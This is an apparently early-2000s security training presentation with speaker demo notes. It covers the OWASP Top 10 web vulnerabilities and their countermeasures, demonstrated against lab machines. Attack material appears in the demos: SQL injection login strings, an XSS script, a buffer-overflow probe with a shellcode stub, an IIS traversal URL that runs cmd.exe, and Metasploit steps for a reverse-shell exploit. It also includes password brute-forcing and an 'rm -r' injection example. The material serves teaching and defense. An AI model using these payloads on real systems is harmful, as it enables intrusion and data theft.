Web Security Martin Nystrom, CISSP Security Architect Cisco Systems, Inc. mnystrom@cisco.com

Who am I? Security Architect in Cisco’s InfoSec Responsible for consulting with application teams to secure their architecture Monitor for infrastructure vulnerabilities Infrastructure security architect 12 years developing application architectures Java programmer Master of Engineering – NC State University Bachelor’s - Iowa State University – (1990)

Why worry? Guess.com sanctioned by FTC for exposing private information “…permitting anyone able to construct a properly-crafted URL to pull down every name, credit card number and expiration date in the site's customer database.” U.S. Army systems hacked using WebDAV vulnerability in IIS “…it was a disturbingly successful attack, experts say, because the intruder found and exploited a flaw that took security researchers completely by surprise. “ Millions of credit card numbers compromised at Data Processors International "All indications are the attack on this company's (Internet) address came from the outside, and efforts continue to analyze this attack to see if it could be traced to the attacker," the investigator said. Utah ISP is victim of retaliation following hackers' attack on Al-Jazeera “…impersonating an Al-Jazeera employee, tricked the Web addressing company Network Solutions into making technical changes that effectively turned over temporary control of the network's Arabic and English Web sites...''  What would you do? WebDav: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp US Army article: http://www.msnbc.com/news/886524.asp?0cv=CB10 UTexas article: http://www.securityfocus.com/news/3174 DPI article: http://www.computerworld.com/securitytopics/security/story/0,10801,78747,00.html …” A hacker who recently gained access to millions of credit card numbers appears to have done it by breaking into a computer system at a company that processes transactions for catalog companies and other direct marketers” Kevin Mitnick’s site hacked: http://www.cnn.com/2003/TECH/internet/02/11/hacker.hacked.ap/ …” A hacker calling himself "BugBear" added one page to Mitnick's corporate Web site on January 30 with a message, "Welcome back to freedom, Mr. Kevin," and added that "it was fun and easy to break into your box." He included a photograph of a polar bear with two cubs. “

Why worry? (cont.) Note the rate of growth in incidents.

The goal of an attack Steal data Blackmail Beachhead for other attacks Bragging rights Vandalism Demonstrate vulnerability/satisfy curiosity Damage company reputation What do you need for a credit card attack to be successful? How can you program that to make it more secure? Beachhead: To avoid detection, hop onto multiple servers in multiple countries to route your attack. Example: Route your attack through N. Korea or China Bragging rights: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=69&database=JanT%2edb Vandalism: Al-Jazeera site Embarrass: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=20&database=JanK%2edb

A word of warning These tools and techniques can be dangerous The difference between a hacker and a cracker is…permission Admins will see strange activity in logs, and come looking for you Authorities are prosecuting even the “good guys” for using these tools

Commonly attacked services SMTP servers (port 25) sendmail: “The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application” RPC servers (port 111 & others) NetBIOS shares (ports 135, 139, 445) Blaster worm Sasser worm FTP servers (ports 20, 21) wuftpd vulnerabilities SSH servers (port 22) OpenSSH, PAM vulnerabilities Web servers (ports 80, 443) Apache chunked encoding vulnerability Sendmail: http://www.prognosisx.com/cgi-bin/cgi-script/csNews/csNews.cgi?database=JanY%2edb&command=viewone&id=62&op=t “The address parser performs insufficient bounds checking in certain conditions due to a char to int conversion, making it possible for an attacker to take control of the application. “ NetBIOS: Blaster worm: http://www2.fedcirc.gov/advisories/FA-2003-20.html RPC: http://www.securitynewsportal.com/cgi-bin/cgi-script/csNews/csNews.cgi?command=viewone&id=48&database=JanP%2edb FTP: wuftpd vulnerability http://www.cert.org/advisories/CA-2000-13.html SSH: OpenSSH vulnerability http://freshmeat.net/articles/view/491/ Privilege separation: “The basic idea behind privilege separation is that OpenSSH sshd(8) has something like 27000 lines of code. A lot of them run as root. However, when UsePrivilegeSeparation is enabled, the daemon splits into two parts. A part containing about 2500 lines of code remains as root, and the rest of the code is shoved into a chroot-jail without any privileges. This makes the daemon less vulnerable to attack.” HTTP: Apache http://www.securiteam.com/unixfocus/5HP0G207FY.html Exploit code: http://www.securiteam.com/exploits/5VP0L0U7FM.html

Web server attack Scan to find open ports Find out what’s running on open ports (banner grabbing) Profile the server Windows (look for Kerberos, NetBIOS, AD) Unix Use TCP fingerprinting Probe for weaknesses on interesting ports Default configuration files and settings (e.g. popular IIS ones) Buffer overflows Insecure applications Launch attack Use exploit code from Internet… …or build your own WebDAV exploit: http://www.securiteam.com/exploits/5SP0L159FC.html Compiled exploit: http://www.security.nnov.ru/search/exploits.asp

Scanning… What O/S is this system? Active Directory ports (3268, 3269) and DNS indicate that this is a Windows server, probably a domain controller.

Scanning… What O/S is this system? Show nmap scan against linuxvm, makes a guess at the remote O/S. This is Linux, note port 111 open.

Example Web Application Internet DMZ Protected network Internal network AJP IIOP T9 etc. DB Clear-text or SSL Web server App server (optional) HTTP request Web app Web app Web app transport DB Web app Web client: IE, Mozilla, etc. Apache IIS Netscape etc. J2EE server ColdFusion Oracle 9iAS etc. Perl C++ CGI Java ASP PHP etc. ADO ODBC JDBC etc. Oracle SQL Server etc. HTTP reply (HTML, JavaScript, VBScript, etc.)

OWASP Top 10 Web Application Security Vulnerabilities http://www.owasp.org Unvalidated parameters Broken access control Broken account/session management Cross-site scripting flaws Buffer overflows Command injection flaws Error handling problems Insecure use of cryptography Remote administration flaws Web and app server mis-configuration

Principles Turn off un-needed services Keep systems patched Don’t trust input Watch for logic holes Only provide the necessary information Hide sensitive information Encryption Access controls

#1: Unvalidated Parameters Attacker can easily change any part of the HTTP request before submitting URL Cookies Form fields Hidden fields Headers Encoding is not encrypting Toasted Spam: http://www.toastedspam.com/decode64 Input must be validated on the server (not just the client). CoolCarts: http://www.extremelasers.com Countermeasures Tainting (Perl) Code reviews (check variable against list of allowed values, not vice-versa) Application firewalls CodeSeeker: http://www.owasp.org/codeseeker/ Real-time auditing: http://www.covelight.com Input validation demo Edit hidden values on form Remember to modify action on the form too (replace /cgi-bin with http://www.coolcart.com/cgi-bin) Re-open in browser and click “Preview total” Do NOT submit order Encoding/encrypting demo 1) Start linuxvm 2) Open Sleuth 3) Set Intercept & have it break on all responses 4) Browse to http://linuxvm:8080/manager/html Basic auth for manager/manager in Tomcat manager app: bWFuYWdlcjptYW5hZ2Vy Use this tool for decoding: http://www.toastedspam.com/decode64 Or use this tool… java -classpath c:\javalib\dnsjava\dnsjava-1.3.2.jar;c:\dev\Base64Decoder\classes Base64 decode <text> Alternative to test against unvalidated parameters: http://linuxvm:8080/WebGoat/attack Go to “Hidden field tampering” Save page to disk Open page in TextPad search for “price” – change price search for “action” – change action to http://linuxvm:8080/WebGoat/attack Open page in browser and click “purchase” Notes on perl tainting: http://gunther.web66.com/FAQS/taintmode.html#how #!/usr/local/bin/perl –T The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. In Perl, the first () group match gets assigned to $1, the second () group to $2, and so on. Perl considers these new variables that arise from () groups to be untainted. Once your regular expression has created these variables, you can use them as your new untainted values.

#2: Broken Access Control Usually inconsistently defined/applied Examples Forced browsing past access control checks Path traversal File permissions – may allow access to config/password files Client-side caching Countermeasures Use non-programmatic controls Verify access control via central container Code reviews Open http://linuxvm:8080/WebGoat/attack Go to “Weak Authentication Cookie” Use Sleuth, set Intercept to stop on AuthCookie Log in as dave/dave Observe pattern for cookie encoding (encoding is backwards twice + advance one letter) Log in as jeff/jeff in another browser (requires session hijacking) Change AuthCookie to “ggfkggfk” for Jeff: AuthCookie=ggfkggfk;

#3: Broken Account and Session Management Weak authentication Password-only Easily guessable usernames (admin, etc.) Unencrypted secrets are sniffable How to break in Guess/reset password Have app email you new password Sniff or crack password Backend authentication How are database passwords stored? Trust relationships between hosts (IP address can be spoofed, etc.) Countermeasures Strong passwords Remove default user names Protect sensitive files Use brutus to guess manager password, show how it could be used to break into admin account Target: linuxvm/manager/html Port: 8080 Type: HTTP (Basic Auth) Method HEAD Use Username checked, Single User checked, Userid=manager BREAK IN Show sniffer in win2kvm Brute force crackers: http://packetstormsecurity.nl/Crackers/ Show passwords, database stuff at: http://linuxvm:8080/pg/config/

#4: Cross-Site Scripting (XSS) Attacker uses trusted application/company to reflect malicious code to end-user Attacker can “hide” the malicious code Unicode encoding 2 types of attacks Stored Reflected Wide-spread problem! Countermeasures input validation Positive Negative: “< > ( ) # &” Don’t forget these: “&lt &gt &#40 &#41 &#35 &#38” User/customer education Stored example: http://linuxvm:8080/WebGoat/attack Go to Database XSS example, and store the following in the message field: <script language="javascript" type="text/javascript">alert("Ha Ha Ha");</script> For reflected attack, add the above line to http://www.cisco.com Example of what this can do: http://eyeonsecurity.org/papers/passport.htm CitiBank Phishing scam: http://www.securityfocus.com/infocus/1745

#5: Buffer Overflows Mostly affects web/app servers Can affect apps/libraries too Goal: crash the target app and get a shell Buffer overflow example echo “vrfy `perl –e ‘print “a” x 1000’`” |nc www.targetsystem.com 25 Replace all those “a”s with something like this… char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…” Countermeasures Keep up with bug reports/patches Code reviews Run with limited privileges Use “safer” languages like Java C:\eviltools\overflow-example\Smasher.html Enter DDDDDDDDDDD (11 D’s) You can look up the ASCII function call with… http://www.asciitable.com/ Example against IIS: http://win2kvm/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\ Java security: Re:Speed issues aside (Score:5, Funny) by quantum bit (225091) on Monday September 15, @12:27AM (#6961300) (Last Journal: Friday October 25, @09:59AM) No buffer overflows Without throwing an exception and crashing the program. No dereferencing of null pointers Without crashing the program (java.lang.NullPointerException). No object creation failures (all "new"s succeed) Automatic bounds checking Exception handling Buffer overflow attack against win2kvm Make sure web server is running on win2kvm (Start/Programs/Administrative Tools/Internet Services Manager) Launch Metasploit Framework setg RHOST win2kvm Setg LHOST 192.168.149.1 Setg PAYLOAD winreverse Use exploit iis50_nsiislog_post Check Show targets Set TARGET 0 Setg LPORT 52000 exploit

#6: Command Injection Allows attacker to relay malicious code in form variables or URL System commands SQL Interpreted code (Perl, Python, etc.) Many apps use calls to external programs sendmail Examples Path traversal: “../” Add more commands: “; rm –r *” SQL injection: “’ OR 1=1” Countermeasures Taint all input Avoid system calls (use libraries instead) Run with limited privileges SQL injection example: Go to http://win2kvm/AcmeHackme Generate error by putting a quote at the end of the user name and a simple password. Try username = ' or username like 's%‘ – note that the password is wrong Try ' or username like 's%‘ or ‘– for username with password = anything You are now logged in as sam speed

#7: Error Handling Examples: stack traces, DB dumps Helps attacker know how to target the app Inconsistencies can be revealing too “File not found” vs. “Access denied” Fail-open errors Need to give enough info to user w/o giving too much info to attacker Countermeasures Code review Modify default error pages (404, 401, etc.) Fail open auth example is… http://linuxvm:8080/WebGoat/attack Won’t work with passwords, but if you try it _without_ a password, it lets you in. Show sample code. Show 401 error message on https://www.cybergrants.com after logging in, shows “plsql” in path.

Error messages example

#8: Poor Cryptography Insecure storage of credit cards, passwords, etc. Poor choice of algorithm (or invent your own) Poor randomness Session IDs Tokens Cookies Improper storage in memory Countermeasures Store only what you must Store a hash instead of the full value (SHA-1) Use only vetted, public cryptography Demonstrate md5 tool with on Windows XP laptop with: md5 –dhello md5 –djello Demonstrate encryption with PGP pgp –e /home/mnystrom/example.txt mnystrom (produces example.txt.pgp) pgp /home/mnystrom/example.txt.pgp

#9: Remote Administration Flaws Problems Weak authentication (username=“admin”) Weak encryption Countermeasures Don’t place admin interface on same server Use strong authentication: certificates, tokens, strong passwords, etc. Encrypt entire session (VPN or SSL) Control who has accounts IP restrictions Example: http://linuxvm:8080/soap/admin/index.html Example ColdFusion: http://win2kvm:8500/CFIDE/administrator/index.cfm

#10: Web/App Server Misconfiguration Tension between “work out of the box” and “use only what you need” Developers ≠ web masters Examples Unpatched security flaws (BID example) Misconfigurations that allow directory traversal Administrative services accessible Default accounts/passwords Countermeasures Create and use hardening guides Turn off all unused services Set up and audit roles, permissions, and accounts Set up logging and alerts Oracle 9ias examples: http://www.nextgenss.com IIS Hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Technical Reference NT IIS 5_0 and Win2K Hardening Configuration.htm Apache hardening guide: C:\Documents and Settings\mnystrom\My Documents\InfoSec\Apache hardening guide.doc Examples: Show how an administrator might want to change admin web site properties for Admin web server, select “Directory Security/IP address and domain name restrictions/Edit…” http://win2kvm:4626/iis.asp

Principles Turn off un-needed services Keep systems patched Don’t trust input Watch for logic holes Only provide the necessary information Hide sensitive information Encryption Access controls

Tools used in this preso WebGoat –vulnerable web applications for demonstration VMWare – runs Linux & Windows 2000 virtual machines on demo laptop. nmap –host/port scanning to find vulnerable hosts Ethereal – network traffic sniffing Metasploit Framework – exploit tool Brutus – password cracking Sleuth – HTTP mangling against web sites